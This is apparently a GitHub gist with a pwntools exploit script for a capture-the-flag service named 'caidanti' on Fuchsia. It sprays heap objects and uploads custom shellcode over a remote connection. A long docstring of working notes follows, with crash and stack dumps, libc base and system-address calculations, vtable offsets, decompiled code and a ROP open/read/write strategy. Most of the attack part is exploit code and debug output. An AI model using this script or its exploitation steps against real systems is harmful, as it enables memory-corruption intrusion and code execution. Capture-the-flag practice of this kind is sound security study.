Created
September 16, 2019 01:12
-
-
Save st4rk/e5b86b4cb56813a25027738ffeac23cc to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import struct | |
| context(arch='amd64') | |
| context.log_level = 'debug' | |
| SHELLCODE_NAME = 'shell.bin' | |
| p = remote('fe80::5054:ff:fe63:5e7a%qemu', 31337) | |
| def create_new_secret(i, size): | |
| p.sendline('1') | |
| p.recvuntil('Key: ') | |
| p.sendline(struct.pack('B', 0x41 + i) * size) | |
| p.recvuntil('Initial content: ') | |
| p.sendline(struct.pack('B', 0x43 + i) * size) | |
| p.recvuntil('114514. Bring your own Cài Dān Tí') | |
| def send_shellcode(): | |
| print('[-] sending shellcode') | |
| p.sendline('114514') | |
| p.recvuntil('Your code size: ') | |
| f = open(SHELLCODE_NAME, 'rb') | |
| shellcode = f.read() | |
| f.close | |
| p.sendline(str(len(shellcode))) | |
| print('[-] size: 0x%X' % len(shellcode)) | |
| for i in shellcode: | |
| print('[-] sending byte: 0x%X' % i) | |
| p.send(struct.pack('B', i)) | |
| # get ready for sending the commands | |
| p.recvuntil('114514. Bring your own Cài Dān Tí') | |
| create_new_secret(0, 0x10) | |
| for i in range(1, 15): | |
| create_new_secret(i, 0x80) | |
| send_shellcode() | |
| p.interactive() | |
| """ | |
| f = open(SHELLCODE_NAME, 'rb') | |
| shellcode = f.read() | |
| f.close | |
| for i in shellcode: | |
| print('[-] hex data: 0x%X' % i) | |
| print('[-] size: 0x%X' % len(shellcode)) | |
| [02122.186] 01413:02049> <== sw breakpoint, PC at 0x32d40b10d001 | |
| [02122.186] 01413:02049> CS: 0 RIP: 0x32d40b10d001 EFL: 0x246 CR2: 0 | |
| [02122.186] 01413:02049> RAX: 0 RBX: 0x2 RCX: 0x50b45785098a RDX: 0 | |
| [02122.186] 01413:02049> RSI: 0 RDI: 0 RBP: 0x7bd6f9ce3fe RSP: 0x43874d86ef68 | |
| [02122.186] 01413:02049> R8: 0 R9: 0 R10: 0 R11: 0x206 | |
| [02122.186] 01413:02049> R12: 0x7bd6f9d03a3 R13: 0x7045734effc0 R14: 0x7bd6f9cdea0 R15: 0x32d40b10d000 | |
| [02122.187] 01413:02049> fs.base: 0x129a0de22b38 gs.base: 0 | |
| [02122.187] 01413:02049> errc: 0 | |
| [02122.187] 01413:02049> bottom of user stack: | |
| [02122.187] 01413:02049> 0x000043874d86ef68: 6f9d4205 000007bd 00000000 00000000 |.B.o............| | |
| [02122.187] 01413:02049> 0x000043874d86ef78: c8748f70 000050e6 8c5f3eb0 000074ac |p.t..P...>_..t..| | |
| [02122.187] 01413:02049> 0x000043874d86ef88: 734effc0 00007045 734effd0 00007045 |..NsEp....NsEp..| | |
| [02122.187] 01413:02049> 0x000043874d86ef98: 00000001 00000000 4d86eff0 00004387 |...........M.C..| | |
| [02122.187] 01413:02049> 0x000043874d86efa8: 8c5ab7b8 000074ac 734effd0 00007045 |..Z..t....NsEp..| | |
| [02122.187] 01413:02049> 0x000043874d86efb8: 00000001 00000000 00000000 00000000 |................| | |
| [02122.187] 01413:02049> 0x000043874d86efc8: 00000024 00000000 8c5634a0 000074ac |$........4V..t..| | |
| [02122.187] 01413:02049> 0x000043874d86efd8: 00000009 00000000 f18e14b3 00000000 |................| | |
| [02122.187] 01413:02049> 0x000043874d86efe8: c8748e80 000050e6 c8748fd0 000050e6 |..t..P....t..P..| | |
| [02122.187] 01413:02049> 0x000043874d86eff8: 00000000 00000000 |................| | |
| [02122.187] 01413:02049> arch: x86_64 | |
| [02122.193] 01413:02049> dso: id=3bbb161daecb4232 base=0x74ac8c546000 name=libc.so | |
| [02122.193] 01413:02049> dso: id=6fe653e43b2b5e45 base=0x6e8abbcf8000 name=libc++abi.so.1 | |
| [02122.193] 01413:02049> dso: id=c200204d0d41e6bb base=0x6273815a7000 name=libunwind.so.1 | |
| [02122.193] 01413:02049> dso: id=5d8e98cee74051fe base=0x50b457849000 name=<vDSO> | |
| [02122.193] 01413:02049> dso: id=5aa1a22b01f749ba base=0x491885fa1000 name=libasync-default.so | |
| [02122.193] 01413:02049> dso: id=0e2ccaeccb00d6ab base=0x25879c2c2000 name=libfdio.so | |
| [02122.193] 01413:02049> dso: id=c27f348845222148 base=0xf2d0e849000 name=libc++.so.2 | |
| [02122.193] 01413:02049> dso: id=2aa6571acee24348 base=0x7bd6f9cd000 name=app:/pkg/bin/caidanti | |
| idea: | |
| 000076ac353f30a0 | |
| read the stack (RSP), get libc address and calculate address to system and call it | |
| target: SP + 0x40 | |
| libc_base = | |
| 0x74ac8c5f3eb0 - 0x74ac8c546000 | |
| 0x74ac8c5634a0 | |
| 0x74ac8c546000 | |
| ; start_main | |
| 0x74ac8c5ab7b8 - 0x74ac8c546000 | |
| 8c5634a0 | |
| 0x117B8 -- _text start | |
| _text_start to system add + 0x35060 | |
| .text:00000000000657B6 call qword ptr [p] | |
| .text:00000000000657B8 mov edi, eax ; status | |
| .text:00000000000657BA call _exit | |
| 0x54000 | |
| ; calculate system address | |
| MOV RAX, 0x35030 ; 0x35060 | |
| ADD RBX, RAX | |
| ;LEA RDI, [REL pop_shell] | |
| MOV RDI, 0 | |
| JMP RBX | |
| [01349.773] 01413:01988> {{{bt:1:0x2547f1dee060:sp 0x221dc0fb7f68}}} | |
| [01349.773] 01413:01988> crashsvc: failed to pass exception to handler [thread 12353.12355]: ZX_ERR_PEER_CLOSED (-24) | |
| [01353.018] 01413:01988> <== fatal exception: process /pkg/bin/caidanti[12526] thread initial-thread[12528] | |
| [01353.018] 01413:01988> <== read not-present page fault, PC at 0x7fbb00a5022b | |
| [01353.018] 01413:01988> CS: 0 RIP: 0x7fbb00a5022b EFL: 0x202 CR2: 0xb2 | |
| [01353.018] 01413:01988> RAX: 0x10 RBX: 0x4c9545f74c70 RCX: 0x26 RDX: 0x10 | |
| [01353.018] 01413:01988> RSI: 0x1 RDI: 0x4c9545f74c70 RBP: 0x4c9545f74f58 RSP: 0x4c9545f74f18 | |
| [01353.018] 01413:01988> R8: 0x10 R9: 0 R10: 0x7fbb00a50200 R11: 0x286 | |
| [01353.018] 01413:01988> R12: 0x5d7fa7e0e3a3 R13: 0x26 R14: 0x1 R15: 0x10 | |
| [01353.018] 01413:01988> fs.base: 0x48dbf5645b38 gs.base: 0 | |
| [01353.018] 01413:01988> errc: 0x4 | |
| [01353.018] 01413:01988> bottom of user stack: | |
| 0x7fbb00a5022b | |
| 0x7fbb00a50200 | |
| turns out I need to use open from fdio, let's calculate it | |
| [03070.903] 01413:01988> <== sw breakpoint, PC at 0xff931234002 | |
| [03070.903] 01413:01988> CS: 0 RIP: 0xff931234002 EFL: 0x246 CR2: 0 | |
| [03070.903] 01413:01988> RAX: 0 RBX: 0x7b RCX: 0x7eab62dd698a RDX: 0 | |
| [03070.903] 01413:01988> RSI: 0 RDI: 0 RBP: 0x6cf45fc223fe RSP: 0x35c1272f3f68 | |
| [03070.903] 01413:01988> R8: 0 R9: 0 R10: 0 R11: 0x206 | |
| [03070.903] 01413:01988> R12: 0x6cf45fc243a3 R13: 0x2d417260fc0 R14: 0x6cf45fc21ea0 R15: 0xff931234000 | |
| [03070.903] 01413:01988> fs.base: 0x6b4f2ffcab38 gs.base: 0 | |
| [03070.903] 01413:01988> errc: 0 | |
| [03070.903] 01413:01988> bottom of user stack: | |
| [03070.903] 01413:01988> 0x000035c1272f3f68: 5fc28205 00006cf4 00000000 00000000 |..._.l..........| | |
| [03070.903] 01413:01988> 0x000035c1272f3f78: 5a6d0f70 00005061 1825eeb0 00004bf4 |p.mZaP....%..K..| | |
| [03070.903] 01413:01988> 0x000035c1272f3f88: 17260fc0 000002d4 17260fd0 000002d4 |..&.......&.....| | |
| [03070.903] 01413:01988> 0x000035c1272f3f98: 00000001 00000000 272f3ff0 000035c1 |.........?/'.5..| | |
| [03070.903] 01413:01988> 0x000035c1272f3fa8: 182167b8 00004bf4 17260fd0 000002d4 |.g!..K....&.....| | |
| [03070.903] 01413:01988> 0x000035c1272f3fb8: 00000001 00000000 00000000 00000000 |................| | |
| [03070.903] 01413:01988> 0x000035c1272f3fc8: 00000024 00000000 181ce4a0 00004bf4 |$............K..| | |
| [03070.903] 01413:01988> 0x000035c1272f3fd8: 00000009 00000000 89af5ceb 00000000 |.........\......| | |
| [03070.903] 01413:01988> 0x000035c1272f3fe8: 5a6d0e80 00005061 5a6d0fd0 00005061 |..mZaP....mZaP..| | |
| [03070.903] 01413:01988> 0x000035c1272f3ff8: 00000000 00000000 |................| | |
| [03070.903] 01413:01988> arch: x86_64 | |
| [03070.906] 01413:01988> dso: id=5d8e98cee74051fe base=0x7eab62dcf000 name=<vDSO> | |
| [03070.906] 01413:01988> dso: id=2aa6571acee24348 base=0x6cf45fc21000 name=app:/pkg/bin/caidanti | |
| [03070.906] 01413:01988> dso: id=c200204d0d41e6bb base=0x54436ae41000 name=libunwind.so.1 | |
| [03070.906] 01413:01988> dso: id=3bbb161daecb4232 base=0x4bf4181b1000 name=libc.so | |
| [03070.906] 01413:01988> dso: id=c27f348845222148 base=0x46a69fb49000 name=libc++.so.2 | |
| [03070.906] 01413:01988> dso: id=6fe653e43b2b5e45 base=0x3a571be28000 name=libc++abi.so.1 | |
| [03070.906] 01413:01988> dso: id=5aa1a22b01f749ba base=0x11097e751000 name=libasync-default.so | |
| [03070.906] 01413:01988> dso: id=0e2ccaeccb00d6ab base=0xfd38fc51000 name=libfdio.so | |
| 0x6cf45fc28205 | |
| 0x6cf45fc21000 | |
| 0x7205 | |
| 0x600B | |
| offset to base address: 0x11FA | |
| vtable + 0x20 == read_content of secret | |
| LOAD:0000000000011020 u_obj_vtable dq offset u_obj_ctor ; DATA XREF: create_service_object+2C↑o | |
| LOAD:0000000000011028 dq offset u_obj_dtor | |
| LOAD:0000000000011030 dq offset sub_7590 | |
| LOAD:0000000000011038 dq offset sub_7750 | |
| LOAD:0000000000011040 dq offset sub_79C0 -- update_content/read_content | |
| LOAD:0000000000011048 dq offset sub_7C70 | |
| LOAD:0000000000011050 dq offset sub_7E40 | |
| LOAD:0000000000011058 dq offset sub_7F00 | |
| LOAD:0000000000011060 unk_11060 db 3 | |
| v12 = *(_QWORD *)(stack_buffer - 56); | |
| v13 = *((unsigned __int8 *)input_buffer + 23); | |
| if ( (v13 & 0x80u) != 0LL ) | |
| v13 = *((_QWORD *)input_buffer + 1); | |
| *(_QWORD *)(v12 + 16) = v13; | |
| *(_QWORD *)(v12 + 24) = 0xFFFFFFFFFFFFFFFFLL; | |
| v14 = *((unsigned __int8 *)input_buffer + 23); | |
| v15 = v23; | |
| if ( (v14 & 0x80u) != 0LL ) | |
| v14 = *((_QWORD *)input_buffer + 1); | |
| v22 = stack_buffer - 88; | |
| v16 = (void *)(*(_QWORD *)(stack_buffer - 56) + sub_8E60(stack_buffer - 56, v14, v10, v11, stack_buffer)); | |
| v17 = *((unsigned __int8 *)input_buffer + 23); | |
| if ( (v17 & 0x80u) != 0LL ) | |
| { | |
| v18 = *(void **)input_buffer; | |
| v17 = *((_QWORD *)input_buffer + 1); | |
| } | |
| else | |
| { | |
| v18 = input_buffer; | |
| } | |
| v19 = (_QWORD *)(stack_buffer - 8); | |
| memcpy(v16, v18, v17); | |
| sub_8F90(stack_buffer - | |
| case 5: // list secrets | |
| *((_OWORD *)stack_buffer - 2) = 0LL; | |
| *((_QWORD *)stack_buffer - 2) = 0LL; | |
| v10 = (*(__int64 (__fastcall **)(__int64, char *))(*(_QWORD *)service_obj + 0x18LL))( | |
| service_obj, | |
| stack_buffer - 32); | |
| [05362.890] 01413:02251> crashsvc: failed to pass exception to handler [thread 14259.14261]: ZX_ERR_PEER_CLOSED (-24) | |
| [05392.322] 01413:02251> <== fatal exception: process /pkg/bin/caidanti[14598] thread initial-thread[14600] | |
| [05392.322] 01413:02251> <== sw breakpoint, PC at 0x1a20970a516c | |
| [05392.322] 01413:02251> CS: 0 RIP: 0x1a20970a516c EFL: 0x206 CR2: 0 | |
| [05392.322] 01413:02251> RAX: 0x4141414141414141 RBX: 0x2bfecd3be000 RCX: 0x564fa688c975 RDX: 0 | |
| [05392.322] 01413:02251> RSI: 0x499eb04a6000 RDI: 0 RBP: 0x2bfecd3b93fe RSP: 0x499eb04a6000 | |
| [05392.322] 01413:02251> R8: 0 R9: 0 R10: 0 R11: 0x206 | |
| [05392.322] 01413:02251> R12: 0x2bfecd3c8cc0 R13: 0x79fab848dfc0 R14: 0x2bfecd3ca140 R15: 0x1a20970a5000 | |
| [05392.322] 01413:02251> fs.base: 0x62980c45ab38 gs.base: 0 | |
| [05392.322] 01413:02251> errc: 0 | |
| [05392.322] 01413:02251> bottom of user stack: | |
| [05392.322] 01413:02251> 0x0000499eb04a6000: 41414141 41414141 00000000 00000000 |AAAAAAAA........| | |
| [05392.322] 01413:02251> 0x0000499eb04a6010: 00000000 00000000 00000000 00000000 |................| | |
| [05392.322] 01413:02251> 0x0000499eb04a6020: 00000000 00000000 00000000 00000000 |................| | |
| [05392.322] 01413:02251> 0x0000499eb04a6030: 353f30a0 000076ac 00000000 00000000 |.0?5.v..........| | |
| [05392.322] 01413:02251> 0x0000499eb04a6040: 00000000 00000000 00000000 00000000 |................| | |
| [05392.322] 01413:02251> 0x0000499eb04a6050: d7659000 00001530 00000000 00000000 |..e.0...........| | |
| [05392.322] 01413:02251> 0x0000499eb04a6060: 5fa56fb0 00003641 00000001 00000000 |.o._A6..........| | |
| [05392.323] 01413:02251> 0x0000499eb04a6070: 41414141 41414141 41414141 41414141 |AAAAAAAAAAAAAAAA| | |
| [05392.323] 01413:02251> 0x0000499eb04a6080: 00000000 10000000 41414141 41414141 |........AAAAAAAA| | |
| [05392.323] 01413:02251> 0x0000499eb04a6090: 41414141 41414141 00000000 00000000 |AAAAAAAA........| | |
| [05392.323] 01413:02251> 0x0000499eb04a60a0: 00000000 00000000 00000000 00000000 |................| | |
| [05392.323] 01413:02251> 0x0000499eb04a60b0: 00000000 00000000 00000000 00000000 |................| | |
| [05392.323] 01413:02251> 0x0000499eb04a60c0: 00000000 00000000 00000000 00000000 |................| | |
| [05392.323] 01413:02251> 0x0000499eb04a60d0: 00000000 00000000 00000000 00000000 |................| | |
| [05392.323] 01413:02251> 0x0000499eb04a60e0: 00000000 00000000 00000000 00000000 |................| | |
| [05392.323] 01413:02251> 0x0000499eb04a60f0: 00000000 00000000 00000000 00000000 |................| | |
| SHARED MEMORY + 0x30 == vtable_for_unk_obj | |
| vtable_for_unk_obj - 0xE0A0 == .text base | |
| [06283.807] 01413:02251> 0x00007d293f39dfe0: c5e415df 00000000 6797ce60 0000424c |........`..gLB..| | |
| [06283.807] 01413:02251> 0x00007d293f39dff0: 6797cfd0 0000424c 00000000 00000000 |...gLB..........| | |
| [06283.807] 01413:02251> arch: x86_64 | |
| [06283.819] 01413:02251> dso: id=c09087b32b943945 base=0x60785719e000 name=app:/pkg/bin/caidanti-storage-servi | |
| [06283.819] 01413:02251> dso: id=0e2ccaeccb00d6ab base=0x586c82a9e000 name=libfdio.so | |
| [06283.819] 01413:02251> dso: id=5d8e98cee74051fe base=0x5616838b0000 name=<vDSO> | |
| [06283.819] 01413:02251> dso: id=6fe653e43b2b5e45 base=0x54da4878e000 name=libc++abi.so.1 | |
| [06283.819] 01413:02251> dso: id=3bbb161daecb4232 base=0x50e7f3acf000 name=libc.so | |
| [06283.819] 01413:02251> dso: id=c200204d0d41e6bb base=0x18f24db0f000 name=libunwind.so.1 | |
| [06283.819] 01413:02251> dso: id=5aa1a22b01f749ba base=0xe0aa5043000 name=libasync-default.so | |
| [06283.819] 01413:02251> dso: id=c27f348845222148 base=0x18ded4d4000 name=libc++.so.2 | |
| [06283.819] 01413:02251> {{{reset}}} | |
| [06283.759] 01413:02251> bottom of user stack: | |
| [06283.759] 01413:02251> 0x000026c776304000: 76304008 000026c7 571a32c7 00006078 |.@0v.&...2.Wx`..| | |
| [06283.759] 01413:02251> 0x000026c776304010: 00000000 00000000 00000000 00000000 |................| | |
| [06283.759] 01413:02251> 0x000026c776304020: 00000000 00000000 00000000 00000000 |................| | |
| [06283.759] 01413:02251> 0x000026c776304030: 571b10a0 00006078 00000000 00000000 |...Wx`..........| | |
| [06283.759] 01413:02251> 0x000026c776304040: 00000000 00000000 00000000 00000000 |................| | |
| [06283.759] 01413:02251> 0x000026c776304050: 63b6d000 00007a5f 00000000 00000000 |...c_z..........| | |
| [06283.759] 01413:02251> 0x000026c776304060: 52255fb0 00000d41 00000001 00000000 |._%RA...........| | |
| [06283.759] 01413:02251> 0x000026c776304070: 41414141 41414141 41414141 41414141 |AAAAAAAAAAAAAAAA| | |
| [06283.759] 01413:02251> 0x000026c776304080: 00000000 10000000 41414141 41414141 |........AAAAAAAA| | |
| [06283.759] 01413:02251> 0x000026c776304090: 41414141 41414141 00000000 00000000 |AAAAAAAA........| | |
| [06283.759] 01413:02251> 0x000026c7763040a0: 00000000 00000000 00000000 00000000 |................| | |
| [06283.759] 01413:02251> 0x000026c7763040b0: 00000000 00000000 00000000 00000000 |................| | |
| [06283.759] 01413:02251> 0x000026c7763040c0: 00000000 00000000 00000000 00000000 |................| | |
| [06283.759] 01413:02251> 0x000026c7763040d0: 00000000 00000000 00000000 00000000 |................| | |
| [06283.759] 01413:02251> 0x000026c7763040e0: 00000000 00000000 00000000 00000000 |................| | |
| [06283.759] 01413:02251> 0x000026c7763040f0: 00000000 00000000 00000000 00000000 |................| | |
| [06283.759] 01413:02251> arch: x86_64 | |
| [06283.762] 01413:02251> dso: id=2aa6571acee24348 base=0x7ff034b1a000 name=app:/pkg/bin/caidanti | |
| [06283.762] 01413:02251> dso: id=5d8e98cee74051fe base=0x77b728d7c000 name=<vDSO> | |
| [06283.762] 01413:02251> dso: id=c27f348845222148 base=0x771ca9160000 name=libc++.so.2 | |
| [06283.762] 01413:02251> dso: id=3bbb161daecb4232 base=0x76f36dee7000 name=libc.so | |
| [06283.762] 01413:02251> dso: id=c200204d0d41e6bb base=0x56bc198a5000 name=libunwind.so.1 | |
| [06283.762] 01413:02251> dso: id=5aa1a22b01f749ba base=0x302dd59ae000 name=libasync-default.so | |
| [06283.762] 01413:02251> dso: id=0e2ccaeccb00d6ab base=0x220f479fb000 name=libfdio.so | |
| [06283.762] 01413:02251> dso: id=6fe653e43b2b5e45 base=0xf84964c0000 name=libc++abi.so.1 | |
| [06283.762] 01413:02251> {{{reset}}} | |
| [06283.820] 01413:02251> {{{module:0:libc++.so.2:elf:c27f348845222148}}} | |
| [06283.822] 01413:02251> {{{mmap:0x18ded4d4000:0x53000:load:0:r:0}}} | |
| [06283.822] 01413:02251> {{{mmap:0x18ded527000:0x76000:load:0:rx:0x53000}}} | |
| [06283.822] 01413:02251> {{{mmap:0x18ded59d000:0x5000:load:0:rw:0xc9000}}} | |
| [06283.822] 01413:02251> {{{mmap:0x18ded5a2000:0x3000:load:0:rw:0xce000}}} | |
| [06283.822] 01413:02251> {{{module:0x1:libasync-default.so:elf:5aa1a22b01f749ba}}} | |
| [06283.822] 01413:02251> {{{mmap:0xe0aa5043000:0x1000:load:0x1:r:0}}} | |
| [06283.823] 01413:02251> {{{mmap:0xe0aa5044000:0x1000:load:0x1:rx:0x1000}}} | |
| [06283.823] 01413:02251> {{{mmap:0xe0aa5045000:0x1000:load:0x1:rw:0x2000}}} | |
| [06283.823] 01413:02251> {{{module:0x2:libunwind.so.1:elf:c200204d0d41e6bb}}} | |
| [06283.823] 01413:02251> {{{mmap:0x18f24db0f000:0x4000:load:0x2:r:0}}} | |
| [06283.823] 01413:02251> {{{mmap:0x18f24db13000:0x6000:load:0x2:rx:0x4000}}} | |
| [06283.823] 01413:02251> {{{mmap:0x18f24db19000:0x1000:load:0x2:rw:0xa000}}} | |
| [06283.823] 01413:02251> {{{mmap:0x18f24db1a000:0x1000:load:0x2:rw:0xb000}}} | |
| [06283.823] 01413:02251> {{{module:0x3:libc.so:elf:3bbb161daecb4232}}} | |
| [06283.823] 01413:02251> {{{mmap:0x50e7f3acf000:0x54000:load:0x3:r:0}}} | |
| [06283.823] 01413:02251> {{{mmap:0x50e7f3b23000:0x57000:load:0x3:rx:0x54000}}} | |
| [06283.823] 01413:02251> {{{mmap:0x50e7f3b7a000:0x2000:load:0x3:rw:0xab000}}} | |
| [06283.823] 01413:02251> {{{mmap:0x50e7f3b7c000:0x3000:load:0x3:rw:0xad000}}} | |
| [06283.823] 01413:02251> {{{module:0x4:libc++abi.so.1:elf:6fe653e43b2b5e45}}} | |
| [06283.823] 01413:02251> {{{mmap:0x54da4878e000:0x16000:load:0x4:r:0}}} | |
| [06283.823] 01413:02251> {{{mmap:0x54da487a4000:0x1b000:load:0x4:rx:0x16000}}} | |
| [06283.823] 01413:02251> {{{mmap:0x54da487bf000:0x3000:load:0x4:rw:0x31000}}} | |
| [06283.823] 01413:02251> {{{mmap:0x54da487c2000:0x1000:load:0x4:rw:0x34000}}} | |
| [06283.823] 01413:02251> {{{module:0x5:libzircon.so:elf:5d8e98cee74051fe}}} | |
| [06283.823] 01413:02251> {{{mmap:0x5616838b0000:0x7000:load:0x5:r:0}}} | |
| [06283.823] 01413:02251> {{{mmap:0x5616838b7000:0x1000:load:0x5:rx:0x7000}}} | |
| [06283.823] 01413:02251> {{{module:0x6:libfdio.so:elf:0e2ccaeccb00d6ab}}} | |
| [06283.823] 01413:02251> {{{mmap:0x586c82a9e000:0xe000:load:0x6:r:0}}} | |
| [06283.823] 01413:02251> {{{mmap:0x586c82aac000:0x31000:load:0x6:rx:0xe000}}} | |
| [06283.823] 01413:02251> {{{mmap:0x586c82add000:0x3000:load:0x6:rw:0x3f000}}} | |
| [06283.823] 01413:02251> {{{mmap:0x586c82ae0000:0x4000:load:0x6:rw:0x42000}}} | |
| [06283.823] 01413:02251> {{{module:0x7:<VMO#16036=caidanti-storage-service>:elf:c09087b32b943945}}} | |
| [06283.823] 01413:02251> {{{mmap:0x60785719e000:0x5000:load:0x7:r:0}}} | |
| [06283.823] 01413:02251> {{{mmap:0x6078571a3000:0xe000:load:0x7:rx:0x5000}}} | |
| [06283.823] 01413:02251> {{{mmap:0x6078571b1000:0x1000:load:0x7:rw:0x13000}}} | |
| [06283.823] 01413:02251> {{{mmap:0x6078571b2000:0x1000:load:0x7:rw:0x14000}}} | |
| [06283.823] 01413:02251> {{{bt:1:0x6078571a3276:sp 0x7d293f39df40}}} | |
| [06283.824] 01413:02251> {{{bt:2:0x50e7f3b347b8:sp 0x7d293f39dfb0}}} | |
| [06283.825] 01413:02251> {{{bt:3:0:sp 0x7d293f39e000}}} | |
| 00006078571b10a0 | |
| 000017c7a44c99b0 | |
| STRATEGY: | |
| 1. ROP chain | |
| 2. open | |
| 3. read | |
| 4. print using write | |
| """ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment